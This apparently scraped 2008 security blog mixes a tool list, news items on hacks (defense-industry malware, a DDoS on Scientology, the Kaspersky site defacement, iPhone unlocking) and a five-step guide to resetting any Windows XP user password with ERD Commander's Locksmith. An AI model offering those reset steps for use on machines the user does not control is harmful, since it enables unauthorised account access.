Some sources recognize what gait biometrics says it can do, but doubts it’s ability to perform. A gait system can easily be deceived because walking patterns can be sometimes be altered. Skeptics also doubt gait biometrics ability to perform in real life scenarios, such as airports and large crowds. Regardless of what critics say, gait biometrics will have to prove it’s capabilities in action.
Most wanted top 10 security analyzer
Proxy / ISA Log Analyzer 2.61 (updated 28 May 2008)Proxy/ISA Log Analyzer is a high performance log analyzer that allows you to analyze and quickly generate useful reports on Internet connection usage based on data from logs created by Microsoft Proxy Server 2.0 or Microsoft ISA Server log files.
Security System Analyzer 1.6b2 (updated 21 April 2008)Security System Analyzer is free non-intrusive OVAL-Compatible software. It provides security testers, auditors with an advanced overview of the security policy level applied.
eMailTrackerPro 7.0i (updated 18 January 2008)Identify the sender of email messages, trace and report spammers, identify ‘phishing’ emails and other scammers trying to steal your confidential information.
GFI WebMonitor for ISA Server 4 (updated 22 October 2007)GFI WebMonitor for Microsoft ISA Server allows you to monitor HTTP and FTP downloads for viruses and other malware – in REAL TIME.
GFI EventsManager 7 (updated 3 February 2007)This program monitors the security event logs of all your Windows NT/2000/XP servers and workstations and alerts you to possible intrusions/attacks in real time.
WFP Tools 1.0 (updated 18 January 2006)WFP Tools allows the replacement of the infected/corrupted file with the original clean file you had when Windows was first installed thus avoiding reformatting your computer.
ZoneLog Analyser 1.19 (updated 2 February 2004)ZoneLog Analyser reads and displays the log file generated by ZoneLabs' ZoneAlarm.
proDETECT 0.2b (updated 24 March 2003)proDETECT is an open source promiscious mode scanner with a GUI.
VisualZone 5.7 (updated 10 September 2002)VisualZone is an intrusion analyser and report utility for ZoneAlarm, ZoneAlarm Plus and ZoneAlarm Pro.
19.10.08
How to reset microsoft windows password
ERD Commander is part of the Microsoft Diagnostics and Recovery Toolset (DaRT) whose 30 day evaluation is available here (MSDaRT50Eval.msi - 64.2
MB). We’ve covered MS DaRT earlier in article Perform a System Restore rollback on a non-bootable Windows XP computer. Follow steps 1-7 in that article to create a ERD Commander Boot CD.
1. Insert the ERD Commander Boot CD into the drive and restart the system
2. Boot the computer using ERD Commander Boot CD. You may have to set the boot order in the BIOS first.
3. Select your Windows XP installation from the list
4. From the ERD Commander menu (Start menu), click System Tools and click Locksmith
5. reset whatever user u like
Break news
-->>South korean Army Under attack
The country's defense industry faces a serious security risk from hackers. Grand National Party lawmaker said Sunday based on data provided by the National Security Research Institute that LIGNex1, a guided missile manufacturer, uncovered malicious codes in its major computer systems planted by hackers in March, and Hyundai Heavy Industries, which makes naval vessels, found them in September.
LIGNex1 develops and manufactures Hyunmoo surface-to-surface missile, Haeseong ship-to-ship missile and Shingung portable ground-to-air weapons. Hyundai Heavy Industries manufactures Haeseong, the nation's first Aegis ship, plus destroyers and submarines for the Navy. Although the development costs of such high-tech weapons are kept secret, the construction of the King Sejong the Great-class destroyer is said to cost over W1 trillion (US$1=W1,165) and development of Haeseong ship-to-ship missile W100 billion with each missile at approximately W2 billion.
Source : Chosun Ilbo News paper , NSRI
-->>Teenage hacker charged for DDOS attack on Scientology
A teenager who took part in a distributed denial of service attack against the so-called church of Scientology has been charged.
Dmitriy Guzner, 18, of Verona, New Jersey, is charged with helping in the attack on Scientologist server in January. He has agreed to plead guilty to a single felony charge of unauthorized impairment of a protected computer and pay $37,500 in damages.
Guzner identifies himself as a member of the online group called ‘Anonymous’. The group is a loose collection of internet activist who undertake online activities, such as the attack on Scientology (dubbed Project Chanology), the tracking and arrest of suspected paedophile Chris Forcand and the hacking of vice-presidential candidate Sarah Palin’s email. The Justice Department has said that Guzner will be put on trial in the coming weeks and could face up to ten years in prison.
-->>Internet-scale 'man in the middle' attack disclosed
In Black Hat's October Webinar on Thursday, Anton Kapela, datacenter manager at 5Nines Data, spoke about Internet-scale "man in the middle" attacks.
The talk reprised a last-minute substitution presentation he gave along with Alexander Pilosov at this year's Defcon conference in August. During the conference, the two researchers intercepted all conference Internet traffic at the Riviera Hotel in Las Vegas and ran it through their servers. According to Black Hat founder and director Jeff Moss, most attendees didn't realizing this was being done.
"This is an emergent vulnerability," said Kapela in the Webinar. "It only becomes apparent in thousands of networks, not one." He took effort to explain that this is really a condition of the Internet today. "I'm not talking about any particular failing, or vendor implementation. This is something that happens because we're using it all," he said.
8.10.08
Break News
Source : APACS & THE REGISTER
6.10.08
Break news
4.10.08
Zero day attacks
With experience, however, hackers are becoming faster at exploiting a vulnerability and sometimes a hacker may be the first to discover the vulnerability. In these situations, the vulnerability and the exploit may become apparent on the same day. Since the vulnerability isn't known in advance, there is no way to guard against the exploit before it happens. Companies exposed to such exploits can, however, institute procedures for early detection of an exploit.
A study released by Symantec in early 2004 found that although the number of vulnerabilities discovered was about the same in 2003 as in 2002, the time between the vulnerability and exploits based on it had narrowed. According to the infoAnarchy wiki, "14-day" groups and "7-day" groups carry out an exploit within 14 or 7 days of a product's market release. Conducting a zero-day exploit establishes crackers as members of the elite, because they must have covert industry connections to gain the inside information needed to carry out the attack.
Archive : Kasper Kicked .
The official Malaysian Kaspersky Antivirus's website has been hacked yesterday by a Turkish cracker going by the handle of "m0sted". Along with it, the same cracker hacked also the official Kaspersky S.E.S. online shop and its several other subdomains. The attacker reported "patriotism" as the reason behind the attack and "SQL Injection" as the technical way the intrusion was performed. Both websites has been home page defaced as well as several other secondary pages. The incident, though appearing a simple website defacement, might carry along big risks for end-users because from both the websites, evaluation copies of the Kaspersky Antivirus are distributed to the public. In theory, the attacker could have uploaded trojanized versions of the antivirus, infecting in this way the unaware users attempting a download from a trusted Kaspersky's file repository (remember the trojan in the Debian file repository?).
28.9.08
3G is hacked too !
A group from Brazil has managed to unlock Apple's iPhone 3G handset just days after its release.
The unlocked iPhone is displayed and demonstrated in an online video on a Portuguese-language news blog.
An unlocked iPhone can be used with any Sim card and service provider.
IPhone user Bruno MacMasi said in an interview with Gizmodo that the unlocking process involved modifying the Sim hardware so that the International Mobile Subscriber Identity can be overwritten and removed from the original network.
A similar process was used to unlock the original iPhone last year.
Separately, a group of researchers known as the iPhone Devteam has released the first 'jailbreak' software releases for the iPhone 3G and the iPhone 2.0 software update.
The 'jailbreak' term refers to the process of removing the software controls which prohibit users from installing software outside of the iPhone App Store.
The group, which has asked not to be linked to directly for bandwidth purposes, is currently offering a software utility which automatically performs the jailbreak process.
Unlocked and modified handsets have been an issue ever since Apple first released the iPhone. Users initially were eager to remove the strict controls over installing software and run the handset with other carriers.
While the iPhone App Store has allowed for the distribution of third-party applications, there remains a dedicated group of users wishing to run older third-party applications and software which have not been approved for the Store.
Apple has attempted to remain relatively neutral on the matter. The company said that, while the jailbreak processes will void the warranty and possibly cause damage to the phone when new updates are installed, no special efforts will be made to deliberately disable or 'brick' hacked iPhones.